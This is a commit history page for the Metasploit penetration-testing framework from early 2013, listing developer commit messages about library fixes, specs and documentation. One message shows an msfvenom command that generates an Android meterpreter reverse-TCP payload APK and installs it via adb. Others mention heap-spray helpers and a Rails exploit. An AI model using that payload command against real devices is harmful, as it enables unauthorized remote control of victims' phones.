Commit Graph

4263 Commits (4703a10b640f1abaea769d90983e47b6d7c1cd13)

Author SHA1 Message Date
sinn3r ae94fbdf6c Updates documentation 2013-04-30 17:11:19 -05:00
sinn3r 9cc624456a Adds function js_mstime_malloc
This function takes advantage of MSTIME's CTIMEAnimationBase::put_values
function that's suitable for a no-spray technique (based on wtfuzz's
PoC for MS13-008)
2013-04-30 16:40:10 -05:00
kernelsmith cf7702f7e9 "acitve" should be "aggressive"
fixes http://dev.metasploit.com/redmine/issues/7926 which prevented a
proper search using:
msf> search exploit:type app:server
2013-04-30 13:04:19 -05:00
James Lee 906863676e Fix a logic error in HttpServer
When a module is configured to listen on the INADDR_ANY interface, with
a payload that does not have an LHOST option, it attempts to determine
the srvhost from a client socket which would only be available when the
module has included the TcpClient mixin (i.e., it is both passive and
aggressive stance), causing a NameError for the undefined +sock+.

This commit fixes the problem in two ways:

1. It changes the default cli in get_uri to be the module's self.cli,
   which should always be set when passive modules would need it (e.g., in
   the on_request_uri method).

2. It adds a check to make sure that the calling module has a sock
   before trying to get its peerhost. This was @marthieubean's suggested
   solution in #1775.

[Closes #1775]
2013-04-29 13:44:58 -05:00
Raphael Mudge 21f8e19d55 Single Payloads Cache Assembled Payload Improperly
An earlier change to the framework (prepend_migrate) forced single
payloads to use the internal_generate method of payload.rb.

internal_generate calls build which has a cache to track assembled
payloads. This method assumes that a payload only needs to be
assembled once, with optional values patched in later.

Single payloads do not work this way. Each time they are generated
new assembly source is created with the options hardcoded in.

This fix updates build to use the hashcode of the assembly code as
part of the cache key.

This fixes #7898 -- a bug that prevents a user from generating
multiple variations of a single payload without a restart.
2013-04-29 11:54:53 -04:00
Luke Imhoff 249a09cd52 Update to metasploit_data_models 0.7.1
[#47979793]
2013-04-26 13:14:38 -05:00
sinn3r b1e49e7116 Merge branch 'master' of github.com:rapid7/metasploit-framework into upstream-master 2013-04-25 20:54:28 -05:00
sinn3r 5b0ae1476b Let's word this a little differently 2013-04-25 20:52:51 -05:00
Meatballs b58a775af5 Added opt delay to file_dropper 2013-04-25 20:52:51 -05:00
sinn3r 008266a581 Corrects documentation. Thanks Meatballs1 2013-04-25 19:13:16 -05:00
sinn3r ff87e3622b Changes made according to feedback from Juan and James 2013-04-25 15:19:44 -05:00
Luke Imhoff 9207ed6532 Msf::Ui::Console::CommandDispatcher::Core#search_modules_sql spec
[#47979793]
2013-04-25 14:33:13 -05:00
James Lee 6767eee08a Add in-line signing
Signing the generated APK in the module means users don't have to have
keytool or jarsigner to create a working package.

Example usage:
  ./msfvenom -p android/meterpreter/reverse_tcp \
    LHOST=192.168.99.1 LPORT=2222 -f raw > meterp.apk
  adb install ./meterp.apk
2013-04-25 13:57:54 -05:00
Luke Imhoff 24b97137ea Msf::DBManager Mdm::Module* specs
[#47979793]
2013-04-25 09:46:53 -05:00
sinn3r 6642545551 Adds new JavaScript function "js_download"
"js_download" is a JavaScript function used to download data (text
or binary) from the web server.
2013-04-24 17:36:45 -05:00
Luke Imhoff 492b081280 Msf::DBManager::Export#extract_module_detail_info spec
[#47979793]
2013-04-20 16:44:42 -05:00
Luke Imhoff e5befb7094 Msf::DBManager#report_session specs
[#47979793]
2013-04-19 10:11:33 -05:00
Nathan Einwechter f8fc05bbf9 streamline var assignment 2013-04-18 17:05:28 -04:00
Nathan Einwechter c758831962 streamline var assignment 2013-04-18 17:04:03 -04:00
Nathan Einwechter d9187056c8 msftidy 2013-04-18 13:14:26 -04:00
Nathan Einwechter 288111be4e Fixes RM7883 along with related issue
modified:   lib/msf/ui/console/command_dispatcher/db.rb
2013-04-18 13:08:32 -04:00
Josh c23cf47d74 Fix RM7896, global show opts has non-eval #{text}
thx to mudge for reporting & jduck for properly blaming me.
This change also causes the actual DefaultPromptChar to be displayed vs a hard coded ">"
2013-04-15 22:07:28 -05:00
Tod Beardsley 25fcbd4e70 Landing #1733, setting a sensible heapsray offset
@wchen-r7 says that nobody's using it today, much less relying on the
default, so this should make no functional difference to any browser
exploits.
2013-04-15 16:32:48 -05:00
Tod Beardsley 7f8040c4e4 Lands #1722, Rex::Socket comment docs 2013-04-15 13:44:00 -05:00
Luke Imhoff 2c681005c0 Msf::ModuleManager::Cache spec coverage
[#47979793]
2013-04-15 13:08:12 -05:00
timwr df9c5f4a80 remove unused resources and fix whitespace 2013-04-13 16:22:52 +01:00
scriptjunkie 2c41ca6598 Merge branch 'encoding_fix' of git://github.com/rsmudge/metasploit-framework 2013-04-12 21:10:44 -05:00
sinn3r d28db8a2a3 Forgot the comment 2013-04-12 20:21:10 -05:00
sinn3r f2cbbf43e8 Changes default offset
Points to the beginning of the block
2013-04-12 20:19:47 -05:00
timwr 32bd812bdb android meterpreter 2013-04-12 18:57:04 +01:00
RageLtMan 6eb33ae5ed Rex::Socket::SslTcp set cipher and verify_mode
Update Rex::Socket::SslTcp to accept verification mode string from
Rex::Socket::Parameters, which has been modified accordingly.
Add SSLVerifyMode and SSLCipher options (params and socket work
were done before, but the option was not exposed) to
Msf::Exploit::Tcp.

Testing:
```
>> sock = Rex::Socket::Tcp.create('PeerHost'=>'10.1.1.1','PeerPort'
=>443,'SSL' => true, 'SSLVerifyMode' => 'NONE')
>> sock.sslctx.verify_mode
=> 0
>> sock.close
=> nil
>> sock = Rex::Socket::Tcp.create('PeerHost'=>'10.1.1.1','PeerPort'
=>443,'SSL' => true, 'SSLVerifyMode' => 'PEER')
=> #<Socket:fd 13>
>> sock.sslctx.verify_mode
=> 1
```

Note: this should be able to resolve the recent SSL socket hackery
of exploit/linux/misc/nagios_nrpe_arguments.
2013-04-11 18:00:33 -04:00
James Lee 6a0b240d10 Add some better docs for Rex::Socket 2013-04-10 12:41:41 -05:00
Rob Fuller 2949c4a339 enable stage encoding for reverse_http(s) 2013-04-10 12:10:17 -03:00
Tod Beardsley 6a5d318749 Bumping version. 2013-04-10 08:59:56 -05:00
sinn3r 277bc69140 Merge branch 'bug/rm7288-post-rename' of github.com:jlee-r7/metasploit-framework into jlee-r7-bug/rm7288-post-rename 2013-04-08 10:18:09 -05:00
James Lee cd86a69090 Have Post::File use shiny new session.fs.file.mv
Also adds a quick and dirty test. Verified working on Linux shell, Linux
meterpreter, and Windows x86 and x64 meterpreter.
2013-04-05 01:24:24 -05:00
Brandon Turner 06537e0ab1 Remove the gemcache loader and tools 2013-04-03 16:24:56 -05:00
Luke Imhoff 809969b49f Merge branch 'master' into feature/patchable-web-vuln-import 2013-04-02 22:38:54 -05:00
Luke Imhoff 0bb79ba890 Msf::DBManager#import_msf_xml refactor
[#46491831]

Move Msf::DBManager#import_msf_xml into
Msf::DBManager::ImportMsfXml#import_msf_xml and include
Msf::DBManager::ImportMsfXml to cut down size of the infamous db.rb.
Break up #import_msf_xml to have separate methods for parsing web_forms,
web_pages, and web_vulns.  The method for
web_vulns, #import_msf_web_vuln_element is needed so that it can be overridden in
Pro to handle the Pro-only changes to Mdm::WebVuln.
2013-04-01 16:06:40 -05:00
Luke Imhoff 2317e9cced Fix yard tag warnings
[#46491831]
2013-03-30 17:13:12 -05:00
Luke Imhoff 7ed2812ec3 Fix Cannot resolve link YARD warnings
[#46491831]
2013-03-30 16:58:49 -05:00
Luke Imhoff bc4b87ebd9 Fix Undocumentable method defined on object instance YARD warnings
[#46491831]

Change code to use format that YARD can document without changing
semantics.
2013-03-30 16:05:12 -05:00
Luke Imhoff c210260845 Fix Undocumentable method, missing name YARD warning
[#46491831]

Comments at the start of the file with ## caused YARD to think the
comment was documenting the require call.  By removing the ##, the
warning disappeared.  I did not determine what is special about ## in
file comments.
2013-03-30 15:32:38 -05:00
sinn3r 463725efec Merge branch 'bug/winrm_poke' of github.com:dmaloney-r7/metasploit-framework into dmaloney-r7-bug/winrm_poke 2013-03-29 09:30:21 -05:00
scriptjunkie 79a72a18a9 Merge branch 'exe_only_patch' of git://github.com/agix/metasploit-framework 2013-03-27 18:30:07 -05:00
sinn3r 7bf87f3546 Merge branch 'mipsbe_elf' of github.com:jvazquez-r7/metasploit-framework into jvazquez-r7-mipsbe_elf 2013-03-27 11:55:09 -05:00
Tasos Laskos 380f5f56ae Auxiliary::Web::HTTP#_request: print_error => elog
[SEERM #7839]

Reverted earlier commit.
2013-03-27 16:36:50 +02:00
David Maloney a87e414274 fix winrm poke method 2013-03-26 13:05:33 -05:00
jvazquez-r7 a644ceb016 Added support for mipsbe elf 2013-03-26 17:20:43 +01:00
jvazquez-r7 4fff624632 added initial support for ELF misple 2013-03-26 01:08:31 +01:00
David Maloney 509ae76dc9 make sure we grab the workspace for store_local
store_local calls report note from db.rb directly instead of going
through the report method. this means we might miss the workspace
causing a stack trace
2013-03-22 16:52:38 -05:00
sinn3r 0634cb9892 Need to avoid badchar 0x00
0x00 becomes double null, which functions like a terminator
2013-03-22 13:18:32 -05:00
sinn3r 566806487c Randomize the "div_container" var because it's global
It's best to randomize this variable name because it's global.
2013-03-22 13:16:14 -05:00
sinn3r 1ac31a3e12 Merge branch 'bug/web-path-api-update' of github.com:tasos-r7/metasploit-framework into tasos-r7-bug/web-path-api-update 2013-03-22 12:54:23 -05:00
Tod Beardsley bf85545b4d Fix egypt's typo 2013-03-20 17:15:14 -05:00
sinn3r cce74246d8 Merge branch 'master' of github.com:rapid7/metasploit-framework 2013-03-19 15:03:24 -05:00
Tod Beardsley 6618c098c4 Merges 'bug/obsolete-activerecord-patch'
Not only does this remove the patch, but adds in specs to cover the test
cases that the patch resolved. Verified all steps and landed #1592 before
landing #1611, so this is complete.

[Closes #1611]
2013-03-19 13:10:42 -05:00
Tasos Laskos 11c38d925b Auxiliary::Web::Path: Fuzzable API update
[FIXRM #7817]

Path object was using an outdated fuzzable API which was causing
scan errors.
2013-03-19 18:41:52 +02:00
Tasos Laskos ad39a5cdc3 Auxiliary::Web::HTTP#_request: elog => print_error
[SEERM #7815]

Switched form elog to print_error to make reporting bugs easier on users.
2013-03-19 17:18:44 +02:00
Tod Beardsley 1873053a34 Restore win32pe as the default (not _only) 2013-03-18 15:55:01 -05:00
Tod Beardsley 3a183ffa94 Retabbed for consistent whitespace 2013-03-18 15:40:26 -05:00
Tod Beardsley 418a373f6c Avoid merge conflict over Id SVN tag 2013-03-18 15:39:16 -05:00
Tod Beardsley afcbaffa2b Revert "add -R capability like hosts -R"
Pulling out the set_rhosts_from_addrs -- that's not required for
grep-like functionality, and adding this method to the global namespace
is undesirable.

This reverts commit 52596ae3b4.
2013-03-18 15:28:19 -05:00
Tod Beardsley 91e3f4cca6 Merge 'kernelsmith/msfconsole-grep'
Resolved a conflict between grep and go_pro (go_pro was added after
grep). Adds @kernelsmith's grep command. Josh is determined to have
msfconsole be his default shell, it seems.

[Closes #1320]

Conflicts:
	lib/msf/ui/console/command_dispatcher/core.rb
2013-03-18 14:39:45 -05:00
Luke Imhoff 2075a7b46c Remove active_record patch
[#46141013]

Version 3.2.12 of activerecord contains the changes that the original
patch made so the patch is no longer needed.
2013-03-18 11:32:21 -05:00
Tod Beardsley f46ec73ff0 Fix up usage help for loot cmd 2013-03-14 14:37:15 -05:00
Tod Beardsley 3dca63fee2 Make it clear that you're deleting all loot
You don't get to delete just one chunk of loot.
2013-03-14 14:37:15 -05:00
Joshua Abraham 56611230ff fixed header 2013-03-14 14:37:15 -05:00
Joshua Abraham 0ca0cd5ee1 loot add/remove command for msfconsole 2013-03-14 14:37:15 -05:00
Tasos Laskos 5967991f6f Auxiliary::Web#log_*: details[:category] => #name
Recent category updates to modules caused variations of vulns of the
same type to be ignored leading to a smaller exploitation surface.
Thus, use the #name of the module as the key instead of the category name.
2013-03-12 19:43:47 +02:00
James Lee 32bf7cf8f4 Merge remote-tracking branch 'tasos-r7/bug/web-fuzzable-path' into rapid7
[Closes #1578]
2013-03-12 12:31:32 -05:00
Tasos Laskos c641ca96c1 Auxiliary::Web::Path.from_model: inputs => form.inputs
Fixed uninitialized variable error.
2013-03-11 23:08:41 +02:00
Raphael Mudge d764740779 Convert user/pass tokens to ASCII in db.rb
This commit fixes an Encoding::CompatibilityError incompatible
encoding regexp match (ASCII-8BIT regexp with UTF-8 string) when
sanitizing non-printable tokens from a user/pass string.

The UTF-8 strings are derived from strings passed through the
module.execute RPC call.
2013-03-11 15:02:28 -04:00
jvazquez-r7 f0cee29100 modified CommandDispatcher::Exploit to have the change into account 2013-03-11 18:08:46 +01:00
Tasos Laskos 7e15788bb5 Auxiliary::Web: updated form of vuln storage in parent
#log_fingerprint and #log_resource now create a key in the
parent's #vulns attribute with the name of the vuln type and
store the details of each such vuln under it.
2013-03-08 22:38:23 +02:00
Spencer McIntyre 8b5a83c7f5 Remove the DECODER option 2013-03-08 15:25:16 -05:00
Tasos Laskos ac6065d8f9 Merge remote-tracking branch 'upstream/master' into bug/web-vuln-logging 2013-03-08 21:50:49 +02:00
Tasos Laskos 3422a7c098 Auxiliary::Web: force vuln proof to_s 2013-03-08 21:50:01 +02:00
Spencer McIntyre aceba9fc8a Revert "escape ticks and spaces in paths"
This reverts commit 4c87b1ba36.
2013-03-08 14:37:28 -05:00
James Lee db676f1a88 Whitespace at EOL 2013-03-07 18:20:08 -06:00
Tasos Laskos cf3df4b179 Auxiliary::Web::HTTP: added error output
Instead of using elog when an HTTP request callback throws an
exception, use the HTTP class' parent #print_error.
2013-03-07 20:14:38 +02:00
Tasos Laskos c3b3da4254 Merge remote-tracking branch 'upstream/master' into bug/web-vuln-logging 2013-03-06 23:04:10 +02:00
James Lee 5dff043e3c Whitespace 2013-03-06 14:52:32 -06:00
Tasos Laskos d9a6f5f0ca Merge remote-tracking branch 'upstream/master' into bug/web-vuln-logging 2013-03-06 18:26:18 +02:00
Tasos Laskos c497d5ffef Auxiliary::Web: log methods pass vuln info to parent 2013-03-06 18:25:25 +02:00
Samuel Huckins 09fc52f3d9 Merge pull request #1536 from rapid7/feature/active-record-migrator-migrations-paths
Use ActiveRecord::Migrator  multiple migrations paths support
2013-03-06 08:20:36 -08:00
James Lee 24c0da0adb Merge branch 'rapid7' into doc/cleanup-peparsey 2013-03-05 21:00:26 -06:00
James Lee 27727df415 Merge branch 'R3dy-psexec-mixin2' into rapid7 2013-03-05 14:36:55 -06:00
James Lee a928e5f963 Whitespace 2013-03-05 14:34:56 -06:00
David Maloney f5c23e4b02 fix typo snaffu 2013-03-05 12:35:21 -06:00
David Maloney 1407886e83 Revert "fix a major typo snaffu"
This reverts commit c639de7ccc.
2013-03-05 12:34:51 -06:00
David Maloney c639de7ccc fix a major typo snaffu 2013-03-05 12:33:37 -06:00
James Lee 9084e2a3bb Merge branch 'master' of github.com:rapid7/metasploit-framework into rapid7 2013-03-04 21:10:39 -06:00
James Lee ac63965e4d Merge remote-tracking branch 'gerry/nbe_importing_fix' into rapid7 2013-03-04 20:00:50 -06:00
Brandon Turner 4e31187f72 Use start.sh to start Pro via go_pro command
start.sh (installed with community/pro on apt installs) automatically
starts dependency services (such as postgresql).
2013-03-04 18:35:47 -06:00
Brandon Turner 370aed5973 Silence status output, it is distracting 2013-03-04 18:27:22 -06:00
Brandon Turner fb0237a180 Fix typo 2013-03-04 18:26:59 -06:00
James Lee c0689a7d43 Merge branch 'master' of github.com:rapid7/metasploit-framework into rapid7 2013-03-04 12:14:33 -06:00
David Maloney 6dcca7df78 Remove duplicated header issues
Headers were getting duped back into client config, causing invalid
requests to be sent out
2013-03-04 11:24:26 -06:00
Luke Imhoff 0ddc6b3afa Document Msf::DBManager#initialize_metasploit_data_models 2013-03-02 21:16:02 -06:00
Luke Imhoff c9a162ac33 Correct return type of Msf::DBManager#migrate. 2013-03-02 21:09:45 -06:00
Luke Imhoff af4b3fa287 Use ActiveRecord::Migrator multiple migrations paths support
[#44034071]

ActiveRecord::Migrator has a class attribute, migrations_paths,
specificially for storing a list of different directories that have
migrations in them.  ActiveRecord::Migrator.migrations_paths is used in
rake db:load_config, which is a dependency of db:migrate, etc. that is
passed to ActiveRecord::Migrator.migrate.  Since migrate supports an
array of directories, and not just a single directory, there is no need
to merge all the migrations paths into one temporary directory as was
previously done.
2013-03-02 20:33:48 -06:00
Samuel Huckins 2e4760c486 Merge pull request #1533 from rapid7/feature/migrations-in-metasploit_data_models
All steps passing as described.
2013-03-01 12:54:41 -08:00
Tasos Laskos 99a8ec593b Fixing merge conflicts 2013-03-01 20:21:02 +02:00
David Maloney 4212c36566 Fix up basic auth madness 2013-03-01 11:59:02 -06:00
Samuel Huckins 7b8654a71d Revert "Merge pull request #1534 from tasos-r7/bugfix/web-vuln-confidence"
This reverts commit 3840ddccbc, reversing
changes made to e1891f0836.
2013-03-01 11:41:06 -06:00
Samuel Huckins 3840ddccbc Merge pull request #1534 from tasos-r7/bugfix/web-vuln-confidence
Auxiliary::Web: fixed confidence calculation in log methods
2013-03-01 09:25:07 -08:00
Tasos Laskos 862b813786 Auxiliary::Web: fixed confidence calc in log methods 2013-03-01 18:33:16 +02:00
Luke Imhoff 239e1934b8 Use migrations from metasploit_data_models
[#44034071]

metasploit_data_models version 0.5.0 copied the migrations from
metasploit-framework/data/sql/migrate to
metasploit_data_models/db/migrate so that specs could be written the Mdm
models in metasploit_data_models.  As part of the specs, :null => false
columns that should be :null => true were discovered, so a new migration
was added, but to metasploit_data_models/db/migrate, so it could be
tested.  Instead of replicating migrations back and forth, I'm removing
the migrations completely from metasploit-framework and changing the
default migration path in Msf::DbManager#migration_paths to
MetasploitDataModels.root.join('db', 'migrate').
2013-03-01 09:03:45 -06:00
David Maloney c290bc565e Merge branch 'master' into feature/http/authv2 2013-02-28 14:33:44 -06:00
sinn3r 18c0bb0ac8 Updates description again 2013-02-28 11:34:48 -06:00
sinn3r 8cb5da0794 One size rules them all. 2013-02-28 11:21:23 -06:00
sinn3r 722e077029 Update generic target 2013-02-28 11:09:52 -06:00
sinn3r 2c013cada8 Update documentation for default values 2013-02-28 11:05:18 -06:00
sinn3r 86d78939ad Make objId optional 2013-02-28 11:01:15 -06:00
sinn3r 9f35452d73 Beef up the default values for precise alloc size and consistency 2013-02-28 10:35:40 -06:00
sinn3r bb02dc43b3 Documentation 2013-02-27 15:34:21 -06:00
sinn3r 312638d6a5 Correct allocation size for IE10 2013-02-27 14:32:39 -06:00
sinn3r e3f0757304 Improved version thanks to corelanc0d3r 2013-02-27 14:08:57 -06:00
sinn3r 2a7b4ee3d8 Merge branch 'master' into setstringproperty_spray 2013-02-27 11:15:52 -06:00
Gerry Eisenhaur 724b32af17 Fixed the importing of NBE files 2013-02-26 16:55:26 -08:00
sinn3r 38af8ba866 Merge branch 'feature/sqli-exploitation-mssql' of github.com:tasos-r7/metasploit-framework into tasos-r7-feature/sqli-exploitation-mssql 2013-02-26 13:41:32 -06:00
Brandon Turner 75a36ce171 Merge pull request #1154 from todb/feature/go_pro 2013-02-26 01:09:24 -06:00
Tod Beardsley 08275e8d83 Process.spawn instead of system
Per @bturner-r7's comment here:

https://github.com/rapid7/metasploit-framework/pull/1514#discussion_r3129535
2013-02-25 19:49:02 -06:00
Tod Beardsley 8cff88efac Change from web ui to community / pro 2013-02-25 15:45:55 -06:00
Tasos Laskos 0421cff913 Exploit::Remote::Web#perform_request: timeout set to 10 2013-02-25 19:49:39 +02:00
Tod Beardsley 2141492654 Per @brandont comment, use exit status instead. 2013-02-24 15:24:21 -06:00
HD Moore 9d9d83cf8b Implement per-target arch/platform searches SeeRM #7754 2013-02-24 11:06:29 -06:00
Tod Beardsley 5e1119e2ed A little more error handling for browser launches
Implement a timeout and deal with the case where xdg-open isn't
avialable for whatever reason.
2013-02-24 10:23:12 -06:00
Tod Beardsley 8010cdbd8b Shuffled methods around 2013-02-24 09:33:15 -06:00
Tod Beardsley 8caedd4290 Can't apt-get install inside msfconsole
At least, you can't and expect the service to connect correctly. You
must exit msfconsole and restart it for the migrations to take place.
2013-02-23 23:41:14 -06:00
Tod Beardsley a7c0d62106 Cleanup after some testing 2013-02-23 23:33:08 -06:00
Tod Beardsley d5a074283a Fill in the details of starting, launching, etc 2013-02-23 22:38:29 -06:00
Tod Beardsley a3886a1a6b No smartquotes plz 2013-02-23 17:17:18 -06:00
Tod Beardsley b80343817c Skeleton for acutally go_pro'ing 2013-02-23 09:48:18 -06:00
Tod Beardsley 90a1dcffa3 Adds a random banner offering go_pro 2013-02-23 09:36:06 -06:00
Tod Beardsley 2af930f1ff Adds msfbase_dir, switches on apt existance 2013-02-23 09:19:31 -06:00
Tod Beardsley 0977d1a9b0 help shouldn't go past 80 columns 2013-02-23 08:49:47 -06:00
Tod Beardsley 7509501b18 Adding a go_pro command 2013-02-23 08:46:51 -06:00
sinn3r aa007b9e0a Updates 2013-02-22 20:07:16 -06:00
sinn3r 56fa5ead37 Initial version of js_property_spray 2013-02-22 10:21:20 -06:00
James Lee c423ad2583 Merge branch 'master' of github.com:rapid7/metasploit-framework into rapid7 2013-02-21 15:30:43 -06:00
David Maloney ac6fdf24a2 Fix winrm mixin from revert merge 2013-02-19 22:01:43 -06:00
David Maloney b2563dd6c2 trying to clean up the mess from the revert 2013-02-19 21:25:37 -06:00
Tod Beardsley 3949c851a4 Was, indeed, missing an or pipe 2013-02-19 17:53:48 -06:00
Tod Beardsley d81f177ab6 Adding Nemski's fix
[FixRM #7451]
2013-02-19 17:51:51 -06:00
James Lee 4703278183 Move SMB mixins into their own directory 2013-02-19 12:55:06 -06:00
James Lee ede804e6af Make psexec mixin a bit better
* Removes copy-pasted code from psexec_command module and uses the mixin
  instead

* Uses the SMB protocol to delete files rather than psexec'ing to call
  cmd.exe and del

* Replaces several instances of "rescue StandardError" with better
  exception handling so we don't accidentally swallow things like
  NoMethodError

* Moves file reading and existence checking into the Exploit::SMB mixin
2013-02-19 12:33:19 -06:00
James Lee b72d2b59f8 Add logging in case of exceptions during rm 2013-02-18 18:02:51 -06:00
James Lee 0938190063 Merge branch 'rapid7' into R3dy-psexec-mixin2 2013-02-17 06:08:09 -06:00
James Lee aea76a56de Add some docs to FtpServer 2013-02-13 14:39:19 -06:00
Tod Beardsley 8ddc19e842 Unmerge #1476 and #1444
In that order. #1476 was an attempt to salvage the functionality, but
sinn3r found some more bugs. So, undoing that, and undoing #1444 as
well.

First, do no harm. It's obvious we cannot be making sweeping changes in
libraries like this without a minimum of testing available. #1478 starts
to address that, by the way.

FixRM #7752
2013-02-11 20:49:55 -06:00
nemski b8b445c834 Update lib/msf/core/auxiliary/login.rb
Fix for Bug #7451
2013-02-09 15:32:47 +11:00
James Lee 99218d142b Merge branch 'rapid7' into R3dy-psexec-mixin2 2013-02-08 12:48:06 -06:00
James Lee 5b3b0a8b6d Merge branch 'dmaloney-r7-http/auth_methods' into rapid7 2013-02-08 12:45:35 -06:00
James Lee 2b3c8a68ad Merge remote-tracking branch 'tasos-r7/feature/web_http_request_opts_override' into rapid7 2013-02-08 12:45:02 -06:00
James Lee d2c7dbe160 Merge remote-tracking branch 'wchen-r7/type_error_dir_scanner' into rapid7 2013-02-08 12:39:08 -06:00
sinn3r 8798567d79 Fix bug: TypeError can't convert Fixnum into String
wmap_target_port is retrieved from datastore['RPORT'], and that's a
Fixnum. But wmap_base_url is treating that like a String, so when a
module uses that function, it's doomed.

See:
http://dev.metasploit.com/redmine/issues/7748
2013-02-08 12:05:27 -06:00
James Lee 071df7241b Merge branch 'rapid7' into sonicwall_gms
Conflicts:
	modules/exploits/multi/http/sonicwall_gms_upload.rb

Adds a loop around triggering the WAR payload, which was causing some
unreliability with the Java target.
2013-02-07 21:53:49 -06:00
James Lee e535a3e93f Guard against running broken method on non-windows
This just puts a bandaid around the issue and makes it so FileDropper
doesn't completely break java and posix meterpreter sessions.

[SeeRM #7721]
2013-02-07 21:10:27 -06:00
James Lee 16a0ab1933 Fix comment link and some whitespace 2013-02-07 18:37:11 -06:00
James Lee 13d1045989 Works for java and native linux targets 2013-02-07 16:56:38 -06:00
Tasos Laskos b3e828359d Web::HTTP#_request: allow Rex opt level overrides
Allow overriding options at the Rex level when performing requests
via the Auxiliary::Web::HTTP wrapper.
2013-02-06 01:02:46 +02:00
David Maloney 877fb017b6 remove negotiate requirements
winrm can support basic, and now these modules can too, for free
2013-02-04 16:50:43 -06:00
David Maloney 44d4e298dc Attempting to cleanup winrm auth 2013-02-04 15:48:31 -06:00
David Maloney c71b803413 Add invisible auth to web crawler
the anemone web crawler now properly supports our invisible auth scheme
for rex http.
2013-02-04 14:38:08 -06:00
David Maloney 413c37e506 Add invisible auth to Web::HTTP
add the invisible auth support to tasos' http class
2013-02-04 13:39:40 -06:00
David Maloney 0c57026065 Remove junk added earlier
i added junk to tasos' class when we were going to attempt this a
different way. housekeeping to clean it up
2013-02-04 13:13:08 -06:00
David Maloney 8d013d1034 Merge branch 'master' into http/auth_methods 2013-02-04 13:11:57 -06:00
David Maloney 9497e38ef7 Fix http login scanner
Fix the http_login scanner to use new buitin auth
2013-02-04 12:31:19 -06:00
Royce Davis 7faaa635d3 Fixed exception handling to use smb::proto 2013-02-03 18:46:41 -06:00
HD Moore 797e2604a0 Fix missing require in reverse_tcp_ssl 2013-02-03 17:41:45 -06:00
RageLtMan ffb88baf4a initial module import from SV rev_ssl branch 2013-02-03 15:06:24 -05:00
HD Moore c3801ad083 This adds an openssl CMD payload and handler 2013-02-03 04:44:25 -06:00
David Maloney 61969d575b remove mixin require, more datastore clenaup 2013-02-01 15:12:11 -06:00
David Maloney efe0947286 Start fixing datastore options 2013-02-01 15:12:11 -06:00
David Maloney ef1fc58e5e Remove mixin, start moving into Rex
move auth awareness into rex itself
2013-02-01 15:12:11 -06:00
David Maloney c407fa9e74 add mixjn 2013-02-01 15:12:11 -06:00
David Maloney 5814c59620 move httpauth to mixin
HttpAuth stuff gets it's own little mixin
mix it in to Exploit::Http::Client
mix in it to Auxiliary::Web::HTTP
2013-02-01 15:12:10 -06:00
David Maloney 8e870f3654 merge in sinn3r's changes 2013-02-01 15:12:10 -06:00
sinn3r 95cc84f5e8 Updates normalize_uri()
This function should not remove the trailing slash, because you may
end up getting a different HTTP response.  The new function also
allows multiple URIs as argument, and will just merge & normalize
them together. [SeeRM #7733]
2013-01-30 15:42:21 -06:00
Tod Beardsley 6002e35460 Merge pull request #1397 from wchen-r7/target_uri_fix
normalize_uri fixes (double slashes and trailing slash)
2013-01-29 11:26:30 -08:00
Tod Beardsley c42d4a6617 Merge for CVE-2013-0156 RoR Exploit
Also massages the RUBY payload.
2013-01-28 23:06:05 -06:00
James Lee 92c736a6a9 Move fork stuff out of exploit into payload mixin
Tested xml against 3.2.10 and json against 3.0.19
2013-01-28 21:34:39 -06:00
sinn3r 9a58b7b732 Fix normalize_uri() function
This will make sure all the double slashes are gone.  Also, the
function description is updated to clarify its purpose.
2013-01-28 12:10:21 -06:00
James Lee 3fc9b5d636 Doc cleanup 2013-01-28 00:01:45 -06:00
Tod Beardsley 2965fa480e Some errant spaces 2013-01-25 05:41:28 -06:00
Tasos Laskos a081389f86 Auxiliary::Web, Exploit::Remote::Web: style updates 2013-01-29 03:08:53 +02:00
Tasos Laskos 76e0305dcf Merge remote-tracking branch 'upstream/master' into web-modules 2013-01-29 01:06:26 +02:00
scriptjunkie d9e1653443 Use EXITFUNC if present to save space and be more correct.
Jump straight to payload on process failure to save space.
2013-01-24 17:14:25 -06:00
Tasos Laskos 9aaca2eae9 Auxiliary::Web::HTTP: updated exception handling
[FIXRM #7724]

Updated #run and #_requestto rescue and elog all exception.
2013-01-24 22:07:17 +02:00
Trevor Rosen 60e871b8d4 Merge pull request #1365 from todb-r7/banner-logos
Delivers Pro #41793473
2013-01-24 09:07:41 -08:00
Tasos Laskos 477ab65d55 Exploit::Remote::Web: added #tries method
#tries method indicates how many times we should run a module until
we establish a session.
2013-01-23 23:05:22 +02:00
Tod Beardsley e920594534 Whitespace cleanup, no blank lines plz 2013-01-23 14:23:38 -06:00
Tod Beardsley d0382b68c7 One more backslash 2013-01-23 14:18:40 -06:00
Tod Beardsley 40dcbe0e89 Fix escaping, whitespace
Since banners are now just data and not code, they don't need their
backslashes escaped any more.
2013-01-23 14:16:49 -06:00
Tod Beardsley 537e12cf16 Render the banners nicely 2013-01-23 13:59:34 -06:00
HD Moore b4f5c3b6ed Fix up set_rhosts for all db commands 2013-01-23 10:10:02 -06:00
HD Moore 1477cda3d4 fix set_rhosts behavior/bugs.
msf  exploit(rails_xml_yaml_code_exec) > hosts

Hosts
=====

address     mac                name          os_name            os_flavor  os_sp  purpose  info  comments
-------     ---                ----          -------            ---------  -----  -------  ----  --------
10.0.0.105  00:0C:29:59:65:08  VMWIN2000SP4  Microsoft Windows                    client

msf  exploit(rails_xml_yaml_code_exec) > hosts -R

Hosts
=====

address     mac                name          os_name            os_flavor  os_sp  purpose  info  comments
-------     ---                ----          -------            ---------  -----  -------  ----  --------
10.0.0.105  00:0C:29:59:65:08  VMWIN2000SP4  Microsoft Windows                    client

RHOSTS => 10.0.0.105

msf  exploit(rails_xml_yaml_code_exec) > exit
2013-01-23 10:00:24 -06:00
sinn3r 9e5370eb2f Merge branch 'slight_speedup_to_db_hosts-R' of github.com:kernelsmith/metasploit-framework into kernelsmith-slight_speedup_to_db_hosts-R 2013-01-23 00:20:55 -06:00
James Lee ff7756cd54 Make #prepends() actually work 2013-01-22 16:10:44 -06:00
Tasos Laskos 33e9f182bd Merge remote-tracking branch 'upstream/master' into web-modules 2013-01-22 23:43:25 +02:00
Tasos Laskos 6b5c6c3a0c Auxiliary::Web::Analysis::Differential
Removed payload option from #process_vulnerability call
2013-01-22 23:41:36 +02:00
Tasos Laskos 0d564c1ce8 Auxiliary::Web::Analysis::Timing
Updated to pick the largest matching payload from the payload list.
2013-01-22 23:40:30 +02:00
Tasos Laskos f2beb5bf19 Auxiliary::Web#process_vulnerability: payload fix
Updated to pick the largest matching payload from the payload list.
2013-01-22 23:39:16 +02:00
